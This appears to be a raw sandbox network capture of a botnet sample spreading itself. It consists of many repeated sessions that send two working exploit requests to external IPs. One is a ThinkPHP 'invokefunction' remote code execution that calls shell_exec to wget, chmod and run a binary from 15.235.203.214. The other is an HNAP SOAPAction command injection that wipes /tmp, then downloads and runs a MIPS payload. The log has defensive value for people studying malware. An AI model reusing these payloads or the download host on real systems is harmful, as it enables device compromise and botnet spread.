                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                33192.168.2.144044695.62.179.6780
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.532669067 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                34192.168.2.143964652.83.62.1348081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.533163071 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                35192.168.2.145657095.139.191.11580
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.539514065 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                36192.168.2.1444966162.1.131.2328081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.540108919 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                37192.168.2.144036295.41.85.6380
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.546164989 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                38192.168.2.143506025.156.123.1518081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.547171116 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                39192.168.2.144351095.232.173.1980
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.552613020 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                40192.168.2.145637672.126.240.2548081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.553235054 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                41192.168.2.143934095.36.201.8780
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.559508085 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                42192.168.2.145967681.104.141.1588081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.560436010 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                43192.168.2.145569295.55.62.24480
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.567370892 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                44192.168.2.1456906168.224.43.1658081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.568341970 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                45192.168.2.143461895.156.74.11180
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.572501898 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                46192.168.2.145408475.195.2.2058081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.573079109 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                47192.168.2.145783495.158.80.4380
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.577285051 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                48192.168.2.1437504108.194.57.1788081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.577832937 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                49192.168.2.143927495.121.142.21580
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.582432032 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                50192.168.2.1453894210.161.174.1948081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.583050013 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
